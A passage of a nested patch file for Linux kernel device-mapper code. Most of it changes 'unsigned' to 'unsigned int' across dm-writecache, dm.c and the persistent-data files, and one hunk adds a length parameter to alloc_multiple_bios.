+@@ -502,11 +502,11 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		COMPLETION_INITIALIZER_ONSTACK(endio.c),
+ 		ATOMIC_INIT(1),
+ 	};
+-	unsigned bitmap_bits = wc->dirty_bitmap_size * 8;
+-	unsigned i = 0;
++	unsigned int bitmap_bits = wc->dirty_bitmap_size * 8;
++	unsigned int i = 0;
+ 
+ 	while (1) {
+-		unsigned j;
++		unsigned int j;
+ 		i = find_next_bit(wc->dirty_bitmap, bitmap_bits, i);
+ 		if (unlikely(i == bitmap_bits))
+ 			break;
+@@ -1100,7 +1100,7 @@ erase_this:
+ 	wc_unlock(wc);
+ }
+ 
+-static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1133,7 +1133,7 @@ static int process_flush_mesg(unsigned argc, char **argv, struct dm_writecache *
+ 	return 0;
+ }
+ 
+-static int process_flush_on_suspend_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_flush_on_suspend_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1153,7 +1153,7 @@ static void activate_cleaner(struct dm_writecache *wc)
+ 	wc->freelist_low_watermark = wc->n_blocks;
+ }
+ 
+-static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_cleaner_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1167,7 +1167,7 @@ static int process_cleaner_mesg(unsigned argc, char **argv, struct dm_writecache
+ 	return 0;
+ }
+ 
+-static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writecache *wc)
++static int process_clear_stats_mesg(unsigned int argc, char **argv, struct dm_writecache *wc)
+ {
+ 	if (argc != 1)
+ 		return -EINVAL;
+@@ -1179,8 +1179,8 @@ static int process_clear_stats_mesg(unsigned argc, char **argv, struct dm_writec
+ 	return 0;
+ }
+ 
+-static int writecache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++static int writecache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct dm_writecache *wc = ti->private;
+@@ -1238,9 +1238,9 @@ static void memcpy_flushcache_optimized(void *dest, void *source, size_t size)
+ static void bio_copy_block(struct dm_writecache *wc, struct bio *bio, void *data)
+ {
+ 	void *buf;
+-	unsigned size;
++	unsigned int size;
+ 	int rw = bio_data_dir(bio);
+-	unsigned remaining_size = wc->block_size;
++	unsigned int remaining_size = wc->block_size;
+ 
+ 	do {
+ 		struct bio_vec bv = bio_iter_iovec(bio, bio->bi_iter);
+@@ -1371,7 +1371,7 @@ read_next_block:
+ static void writecache_bio_copy_ssd(struct dm_writecache *wc, struct bio *bio,
+ 				    struct wc_entry *e, bool search_used)
+ {
+-	unsigned bio_size = wc->block_size;
++	unsigned int bio_size = wc->block_size;
+ 	sector_t start_cache_sec = cache_sector(wc, e);
+ 	sector_t current_cache_sec = start_cache_sec + (bio_size >> SECTOR_SHIFT);
+ 
+@@ -1540,7 +1540,7 @@ static int writecache_map(struct dm_target *ti, struct bio *bio)
+ 
+ 	bio->bi_iter.bi_sector = dm_target_offset(ti, bio->bi_iter.bi_sector);
+ 
+-	if (unlikely((((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (unlikely((((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 				(wc->block_size / 512 - 1)) != 0)) {
+ 		DMERR("I/O is not aligned, sector %llu, size %u, block size %u",
+ 		      (unsigned long long)bio->bi_iter.bi_sector,
+@@ -1666,7 +1666,7 @@ static void writecache_copy_endio(int read_err, unsigned long write_err, void *p
+ 
+ static void __writecache_endio_pmem(struct dm_writecache *wc, struct list_head *list)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct writeback_struct *wb;
+ 	struct wc_entry *e;
+ 	unsigned long n_walked = 0;
+@@ -1782,7 +1782,7 @@ pop_from_list:
+ static bool wc_add_block(struct writeback_struct *wb, struct wc_entry *e)
+ {
+ 	struct dm_writecache *wc = wb->wc;
+-	unsigned block_size = wc->block_size;
++	unsigned int block_size = wc->block_size;
+ 	void *address = memory_data(wc, e);
+ 
+ 	persistent_memory_flush_cache(address, block_size);
+@@ -1817,7 +1817,7 @@ static void __writecache_writeback_pmem(struct dm_writecache *wc, struct writeba
+ 	struct wc_entry *e, *f;
+ 	struct bio *bio;
+ 	struct writeback_struct *wb;
+-	unsigned max_pages;
++	unsigned int max_pages;
+ 
+ 	while (wbl->size) {
+ 		wbl->size--;
+@@ -1880,7 +1880,7 @@ static void __writecache_writeback_ssd(struct dm_writecache *wc, struct writebac
+ 	struct copy_struct *c;
+ 
+ 	while (wbl->size) {
+-		unsigned n_sectors;
++		unsigned int n_sectors;
+ 
+ 		wbl->size--;
+ 		e = container_of(wbl->list.prev, struct wc_entry, lru);
+@@ -2092,7 +2092,7 @@ restart:
+ 	}
+ }
+ 
+-static int calculate_memory_size(uint64_t device_size, unsigned block_size,
++static int calculate_memory_size(uint64_t device_size, unsigned int block_size,
+ 				 size_t *n_blocks_p, size_t *n_metadata_blocks_p)
+ {
+ 	uint64_t n_blocks, offset;
+@@ -2207,12 +2207,12 @@ static void writecache_dtr(struct dm_target *ti)
+ 	kfree(wc);
+ }
+ 
+-static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int writecache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_writecache *wc;
+ 	struct dm_arg_set as;
+ 	const char *string;
+-	unsigned opt_params;
++	unsigned int opt_params;
+ 	size_t offset, data_size;
+ 	int i, r;
+ 	char dummy;
+@@ -2419,7 +2419,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 				goto invalid_optional;
+ 			wc->autocommit_blocks_set = true;
+ 		} else if (!strcasecmp(string, "autocommit_time") && opt_params >= 1) {
+-			unsigned autocommit_msecs;
++			unsigned int autocommit_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &autocommit_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2429,7 +2429,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 			wc->autocommit_time_value = autocommit_msecs;
+ 			wc->autocommit_time_set = true;
+ 		} else if (!strcasecmp(string, "max_age") && opt_params >= 1) {
+-			unsigned max_age_msecs;
++			unsigned int max_age_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &max_age_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2454,7 +2454,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		} else if (!strcasecmp(string, "metadata_only")) {
+ 			wc->metadata_only = true;
+ 		} else if (!strcasecmp(string, "pause_writeback") && opt_params >= 1) {
+-			unsigned pause_msecs;
++			unsigned int pause_msecs;
+ 			if (WC_MODE_PMEM(wc))
+ 				goto invalid_optional;
+ 			string = dm_shift_arg(&as), opt_params--;
+@@ -2653,11 +2653,11 @@ bad:
+ }
+ 
+ static void writecache_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result, unsigned maxlen)
++			      unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_writecache *wc = ti->private;
+-	unsigned extra_args;
+-	unsigned sz = 0;
++	unsigned int extra_args;
++	unsigned int sz = 0;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 38d8aa21ef7ac..24284d22f15bc 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -83,7 +83,7 @@ struct clone_info {
+ 	struct bio *bio;
+ 	struct dm_io *io;
+ 	sector_t sector;
+-	unsigned sector_count;
++	unsigned int sector_count;
+ 	bool is_abnormal_io:1;
+ 	bool submit_as_polled:1;
+ };
+@@ -111,7 +111,7 @@ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size)
+ }
+ EXPORT_SYMBOL_GPL(dm_bio_from_per_bio_data);
+ 
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio)
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio)
+ {
+ 	return container_of(bio, struct dm_target_io, clone)->target_bio_nr;
+ }
+@@ -142,7 +142,7 @@ struct table_device {
+  * Bio-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_BIO_BASED_IOS		16
+-static unsigned reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
++static unsigned int reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
+ 
+ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ {
+@@ -165,11 +165,10 @@ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ 	return param;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param,
+-			       unsigned def, unsigned max)
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max)
+ {
+-	unsigned param = READ_ONCE(*module_param);
+-	unsigned modified_param = 0;
++	unsigned int param = READ_ONCE(*module_param);
++	unsigned int modified_param = 0;
+ 
+ 	if (!param)
+ 		modified_param = def;
+@@ -184,14 +183,14 @@ unsigned __dm_get_module_param(unsigned *module_param,
+ 	return param;
+ }
+ 
+-unsigned dm_get_reserved_bio_based_ios(void)
++unsigned int dm_get_reserved_bio_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_bio_based_ios,
+ 				     RESERVED_BIO_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ EXPORT_SYMBOL_GPL(dm_get_reserved_bio_based_ios);
+ 
+-static unsigned dm_get_numa_node(void)
++static unsigned int dm_get_numa_node(void)
+ {
+ 	return __dm_get_module_param_int(&dm_numa_node,
+ 					 DM_NUMA_NODE, num_online_nodes() - 1);
+@@ -603,7 +602,7 @@ static void free_io(struct dm_io *io)
+ }
+ 
+ static struct bio *alloc_tio(struct clone_info *ci, struct dm_target *ti,
+-			     unsigned target_bio_nr, unsigned *len, gfp_t gfp_mask)
++			     unsigned int target_bio_nr, unsigned int *len, gfp_t gfp_mask)
+ {
+ 	struct mapped_device *md = ci->io->md;
+ 	struct dm_target_io *tio;
+@@ -1327,11 +1326,11 @@ out:
+  * the partially processed part (the sum of regions 1+2) must be the same for all
+  * copies of the bio.
+  */
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors)
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors)
+ {
+ 	struct dm_target_io *tio = clone_to_tio(bio);
+ 	struct dm_io *io = tio->io;
+-	unsigned bio_sectors = bio_sectors(bio);
++	unsigned int bio_sectors = bio_sectors(bio);
+ 
+ 	BUG_ON(dm_tio_flagged(tio, DM_TIO_IS_DUPLICATE_BIO));
+ 	BUG_ON(op_is_zone_mgmt(bio_op(bio)));
+@@ -1460,7 +1459,7 @@ static void __map_bio(struct bio *clone)
+ 	}
+ }
+ 
+-static void setup_split_accounting(struct clone_info *ci, unsigned len)
++static void setup_split_accounting(struct clone_info *ci, unsigned int len)
+ {
+ 	struct dm_io *io = ci->io;
+ 
+@@ -1476,7 +1475,8 @@ static void setup_split_accounting(struct clone_info *ci, unsigned len)
+ }
+ 
+ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+-				struct dm_target *ti, unsigned num_bios)
++				struct dm_target *ti, unsigned int num_bios,
++				unsigned *len)
+ {
+ 	struct bio *bio;
+ 	int try;
+@@ -1487,7 +1487,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ 		if (try)
+ 			mutex_lock(&ci->io->md->table_devices_lock);
+ 		for (bio_nr = 0; bio_nr < num_bios; bio_nr++) {
+-			bio = alloc_tio(ci, ti, bio_nr, NULL,
++			bio = alloc_tio(ci, ti, bio_nr, len,
+ 					try ? GFP_NOIO : GFP_NOWAIT);
+ 			if (!bio)
+ 				break;
+@@ -1505,7 +1505,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ }
+ 
+ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+-				 unsigned int num_bios, unsigned *len)
++				 unsigned int num_bios, unsigned int *len)
+ {
+ 	struct bio_list blist = BIO_EMPTY_LIST;
+ 	struct bio *clone;
+@@ -1525,7 +1525,7 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		if (len)
+ 			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+-		alloc_multiple_bios(&blist, ci, ti, num_bios);
++		alloc_multiple_bios(&blist, ci, ti, num_bios, len);
+ 		while ((clone = bio_list_pop(&blist))) {
+ 			dm_tio_set_flag(clone_to_tio(clone), DM_TIO_IS_DUPLICATE_BIO);
+ 			__map_bio(clone);
+@@ -1573,10 +1573,9 @@ static void __send_empty_flush(struct clone_info *ci)
+ }
+ 
+ static void __send_changing_extent_only(struct clone_info *ci, struct dm_target *ti,
+-					unsigned num_bios)
++					unsigned int num_bios)
+ {
+-	unsigned len;
+-	unsigned int bios;
++	unsigned int len, bios;
+ 
+ 	len = min_t(sector_t, ci->sector_count,
+ 		    max_io_len_target_boundary(ti, dm_target_offset(ti, ci->sector)));
+@@ -1614,7 +1613,7 @@ static bool is_abnormal_io(struct bio *bio)
+ static blk_status_t __process_abnormal_io(struct clone_info *ci,
+ 					  struct dm_target *ti)
+ {
+-	unsigned num_bios = 0;
++	unsigned int num_bios = 0;
+ 
+ 	switch (bio_op(ci->bio)) {
+ 	case REQ_OP_DISCARD:
+@@ -1692,7 +1691,7 @@ static blk_status_t __split_and_process_bio(struct clone_info *ci)
+ {
+ 	struct bio *clone;
+ 	struct dm_target *ti;
+-	unsigned len;
++	unsigned int len;
+ 
+ 	ti = dm_table_find_target(ci->map, ci->sector);
+ 	if (unlikely(!ti))
+@@ -2389,7 +2388,7 @@ out_undo_holders:
+ struct mapped_device *dm_get_md(dev_t dev)
+ {
+ 	struct mapped_device *md;
+-	unsigned minor = MINOR(dev);
++	unsigned int minor = MINOR(dev);
+ 
+ 	if (MAJOR(dev) != _major || minor >= (1 << MINORBITS))
+ 		return NULL;
+@@ -2672,7 +2671,7 @@ static void unlock_fs(struct mapped_device *md)
+  * are being added to md->deferred list.
+  */
+ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+-			unsigned suspend_flags, unsigned int task_state,
++			unsigned int suspend_flags, unsigned int task_state,
+ 			int dmf_suspended_flag)
+ {
+ 	bool do_lockfs = suspend_flags & DM_SUSPEND_LOCKFS_FLAG;
+@@ -2779,7 +2778,7 @@ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+  *
+  * To abort suspend, start the request_queue.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags)
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 	int r = 0;
+@@ -2881,7 +2880,7 @@ out:
+  * It may be used only from the kernel.
+  */
+ 
+-static void __dm_internal_suspend(struct mapped_device *md, unsigned suspend_flags)
++static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 
+@@ -2983,10 +2982,10 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent)
++		      unsigned int cookie, bool need_resize_uevent)
+ {
+ 	int r;
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+ 	char *envp[3] = { NULL, NULL, NULL };
+ 	char **envpp = envp;
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index a9a3ffcad084c..a7917df09cafb 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent);
++		      unsigned int cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+@@ -222,6 +222,6 @@ void dm_free_md_mempools(struct dm_md_mempools *pools);
+ /*
+  * Various helpers
+  */
+-unsigned dm_get_reserved_bio_based_ios(void);
++unsigned int dm_get_reserved_bio_based_ios(void);
+ 
+ #endif
+diff --git a/drivers/md/persistent-data/dm-array.c b/drivers/md/persistent-data/dm-array.c
+index 3a963d783a865..eff9b41869f29 100644
+--- a/drivers/md/persistent-data/dm-array.c
++++ b/drivers/md/persistent-data/dm-array.c
+@@ -68,8 +68,8 @@ static int array_block_check(struct dm_block_validator *v,
+ 					       CSUM_XOR));
+ 	if (csum_disk != bh_le->csum) {
+ 		DMERR_LIMIT("array_block_check failed: csum %u != wanted %u",
+-			    (unsigned) le32_to_cpu(csum_disk),
+-			    (unsigned) le32_to_cpu(bh_le->csum));
++			    (unsigned int) le32_to_cpu(csum_disk),
++			    (unsigned int) le32_to_cpu(bh_le->csum));
+ 		return -EILSEQ;
+ 	}
+ 
+@@ -94,7 +94,7 @@ static struct dm_block_validator array_validator = {
+  * index - The index into _this_ specific block.
+  */
+ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+-			unsigned index)
++			unsigned int index)
+ {
+ 	unsigned char *entry = (unsigned char *) (ab + 1);
+ 
+@@ -108,9 +108,9 @@ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+  * in an array block.
+  */
+ static void on_entries(struct dm_array_info *info, struct array_block *ab,
+-		       void (*fn)(void *, const void *, unsigned))
++		       void (*fn)(void *, const void *, unsigned int))
+ {
+-	unsigned nr_entries = le32_to_cpu(ab->nr_entries);
++	unsigned int nr_entries = le32_to_cpu(ab->nr_entries);
+ 	fn(info->value_type.context, element_at(info, ab, 0), nr_entries);
+ }
+ 
+@@ -171,7 +171,7 @@ static int alloc_ablock(struct dm_array_info *info, size_t size_of_block,
+  * the current number of entries.
+  */
+ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+-			const void *value, unsigned new_nr)
++			const void *value, unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta, i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -194,7 +194,7 @@ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+  * entries.
+  */
+ static void trim_ablock(struct dm_array_info *info, struct array_block *ab,
+-			unsigned new_nr)
++			unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -247,7 +247,7 @@ static void unlock_ablock(struct dm_array_info *info, struct dm_block *block)
+  * / max_entries).
+  */
+ static int lookup_ablock(struct dm_array_info *info, dm_block_t root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -295,7 +295,7 @@ static int __shadow_ablock(struct dm_array_info *info, dm_block_t b,
+  * The shadow op will often be a noop.  Only insert if it really
+  * copied data.
+  */
+-static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
++static int __reinsert_ablock(struct dm_array_info *info, unsigned int index,
+ 			     struct dm_block *block, dm_block_t b,
+ 			     dm_block_t *root)
+ {
+@@ -321,7 +321,7 @@ static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
+  * for both the current root block, and the new one.
+  */
+ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -346,7 +346,7 @@ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+  */
+ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ 			     uint32_t max_entries,
+-			     unsigned block_index, uint32_t nr,
++			     unsigned int block_index, uint32_t nr,
+ 			     const void *value, dm_block_t *root)
+ {
+ 	int r;
+@@ -365,8 +365,8 @@ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ }
+ 
+ static int insert_full_ablocks(struct dm_array_info *info, size_t size_of_block,
+-			       unsigned begin_block, unsigned end_block,
+-			       unsigned max_entries, const void *value,
++			       unsigned int begin_block, unsigned int end_block,
++			       unsigned int max_entries, const void *value,
+ 			       dm_block_t *root)
+ {
+ 	int r = 0;
+@@ -402,20 +402,20 @@ struct resize {
+ 	/*
+ 	 * Maximum nr entries in an array block.
+ 	 */
+-	unsigned max_entries;
++	unsigned int max_entries;
+ 
+ 	/*
+ 	 * nr of completely full blocks in the array.
+ 	 *
+ 	 * 'old' refers to before the resize, 'new' after.
+ 	 */
+-	unsigned old_nr_full_blocks, new_nr_full_blocks;
++	unsigned int old_nr_full_blocks, new_nr_full_blocks;
+ 
+ 	/*
+ 	 * Number of entries in the final block.  0 iff only full blocks in
+ 	 * the array.
+ 	 */
+-	unsigned old_nr_entries_in_last_block, new_nr_entries_in_last_block;
++	unsigned int old_nr_entries_in_last_block, new_nr_entries_in_last_block;
+ 
+ 	/*
+ 	 * The default value used when growing the array.
+@@ -430,8 +430,8 @@ struct resize {
+  * begin_index - the index of the first array block to remove.
+  * end_index - the one-past-the-end value.  ie. this block is not removed.
+  */
+-static int drop_blocks(struct resize *resize, unsigned begin_index,
+-		       unsigned end_index)
++static int drop_blocks(struct resize *resize, unsigned int begin_index,
++		       unsigned int end_index)
+ {
+ 	int r;
+ 
+@@ -449,8 +449,8 @@ static int drop_blocks(struct resize *resize, unsigned begin_index,
+ /*
+  * Calculates how many blocks are needed for the array.
+  */
+-static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+-				       unsigned nr_entries_in_last_block)
++static unsigned int total_nr_blocks_needed(unsigned int nr_full_blocks,
++				       unsigned int nr_entries_in_last_block)
+ {
+ 	return nr_full_blocks + (nr_entries_in_last_block ? 1 : 0);
+ }
+@@ -461,7 +461,7 @@ static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+ static int shrink(struct resize *resize)
+ {
+ 	int r;
+-	unsigned begin, end;
++	unsigned int begin, end;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+@@ -527,7 +527,7 @@ static int grow_add_tail_block(struct resize *resize)
+ static int grow_needs_more_blocks(struct resize *resize)
+ {
+ 	int r;
+-	unsigned old_nr_blocks = resize->old_nr_full_blocks;
++	unsigned int old_nr_blocks = resize->old_nr_full_blocks;
+ 
+ 	if (resize->old_nr_entries_in_last_block > 0) {
+ 		old_nr_blocks++;
+@@ -569,11 +569,11 @@ static int grow(struct resize *resize)
+  * These are the value_type functions for the btree elements, which point
+  * to array blocks.
+  */
+-static void block_inc(void *context, const void *value, unsigned count)
++static void block_inc(void *context, const void *value, unsigned int count)
+ {
+ 	const __le64 *block_le = value;
+ 	struct dm_array_info *info = context;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, block_le++)
+ 		dm_tm_inc(info->btree_info.tm, le64_to_cpu(*block_le));
+@@ -618,9 +618,9 @@ static void __block_dec(void *context, const void *value)
+ 	dm_tm_dec(info->btree_info.tm, b);
+ }
+ 
+-static void block_dec(void *context, const void *value, unsigned count)
++static void block_dec(void *context, const void *value, unsigned int count)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < count; i++, value += sizeof(__le64))
+ 		__block_dec(context, value);
+ }
+@@ -700,10 +700,11 @@ int dm_array_resize(struct dm_array_info *info, dm_block_t root,
+ EXPORT_SYMBOL_GPL(dm_array_resize);
+ 
+ static int populate_ablock_with_values(struct dm_array_info *info, struct array_block *ab,
+-				       value_fn fn, void *context, unsigned base, unsigned new_nr)
++				       value_fn fn, void *context,
++				       unsigned int base, unsigned int new_nr)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+ 	BUG_ON(le32_to_cpu(ab->nr_entries));
+@@ -728,7 +729,7 @@ int dm_array_new(struct dm_array_info *info, dm_block_t *root,
+ 	int r;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned block_index, end_block, size_of_block, max_entries;
++	unsigned int block_index, end_block, size_of_block, max_entries;
+ 
+ 	r = dm_array_empty(info, root);
+ 	if (r)
+@@ -776,7 +777,7 @@ int dm_array_get_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned entry, max_entries;
++	unsigned int entry, max_entries;
+ 
+ 	size_of_block = dm_bm_block_size(dm_tm_get_bm(info->btree_info.tm));
+ 	max_entries = calc_max_entries(info->value_type.size, size_of_block);
+@@ -804,8 +805,8 @@ static int array_set_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned max_entries;
+-	unsigned entry;
++	unsigned int max_entries;
++	unsigned int entry;
+ 	void *old_value;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+@@ -861,9 +862,9 @@ static int walk_ablock(void *context, uint64_t *keys, void *leaf)
+ 	struct walk_info *wi = context;
+ 
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	__le64 block_le;
+-	unsigned nr_entries, max_entries;
++	unsigned int nr_entries, max_entries;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+diff --git a/drivers/md/persistent-data/dm-array.h b/drivers/md/persistent-data/dm-array.h
+index d7d2d579c662c..b6c7077c73591 100644
+--- a/drivers/md/persistent-data/dm-array.h
++++ b/drivers/md/persistent-data/dm-array.h
+@@ -198,7 +198,7 @@ struct dm_array_cursor {
+ 
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ int dm_array_cursor_begin(struct dm_array_info *info,
+diff --git a/drivers/md/persistent-data/dm-bitset.c b/drivers/md/persistent-data/dm-bitset.c
+index b7208d82e748a..625d93498cddb 100644
+--- a/drivers/md/persistent-data/dm-bitset.c
++++ b/drivers/md/persistent-data/dm-bitset.c
+@@ -41,7 +41,7 @@ EXPORT_SYMBOL_GPL(dm_bitset_empty);
+ 
+ struct packer_context {
+ 	bit_value_fn fn;
+-	unsigned nr_bits;
++	unsigned int nr_bits;
+ 	void *context;
+ };
+ 
+@@ -49,7 +49,7 @@ static int pack_bits(uint32_t index, void *value, void *context)
+ {
+ 	int r;
+ 	struct packer_context *p = context;
+-	unsigned bit, nr = min(64u, p->nr_bits - (index * 64));
++	unsigned int bit, nr = min(64u, p->nr_bits - (index * 64));
+ 	uint64_t word = 0;
+ 	bool bv;
+ 
+@@ -147,7 +147,7 @@ static int get_array_entry(struct dm_disk_bitset *info, dm_block_t root,
+ 			   uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned array_index = index / BITS_PER_ARRAY_ENTRY;
++	unsigned int array_index = index / BITS_PER_ARRAY_ENTRY;
+ 
+ 	if (info->current_index_set) {
+ 		if (info->current_index == array_index)
+@@ -165,7 +165,7 @@ int dm_bitset_set_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		      uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -182,7 +182,7 @@ int dm_bitset_clear_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 			uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -199,7 +199,7 @@ int dm_bitset_test_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		       uint32_t index, dm_block_t *new_root, bool *result)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 11935864f50f5..1f40100908d7c 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -57,10 +57,10 @@ struct waiter {
+ 	int wants_write;
+ };
+ 
+-static unsigned __find_holder(struct block_lock *lock,
++static unsigned int __find_holder(struct block_lock *lock,
+ 			      struct task_struct *task)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++)
+ 		if (lock->holders[i] == task)
+@@ -73,7 +73,7 @@ static unsigned __find_holder(struct block_lock *lock,
+ /* call this *after* you increment lock->count */
+ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, NULL);
++	unsigned int h = __find_holder(lock, NULL);
+ #ifdef CONFIG_DM_DEBUG_BLOCK_STACK_TRACING
+ 	struct stack_store *t;
+ #endif
+@@ -90,14 +90,14 @@ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ /* call this *before* you decrement lock->count */
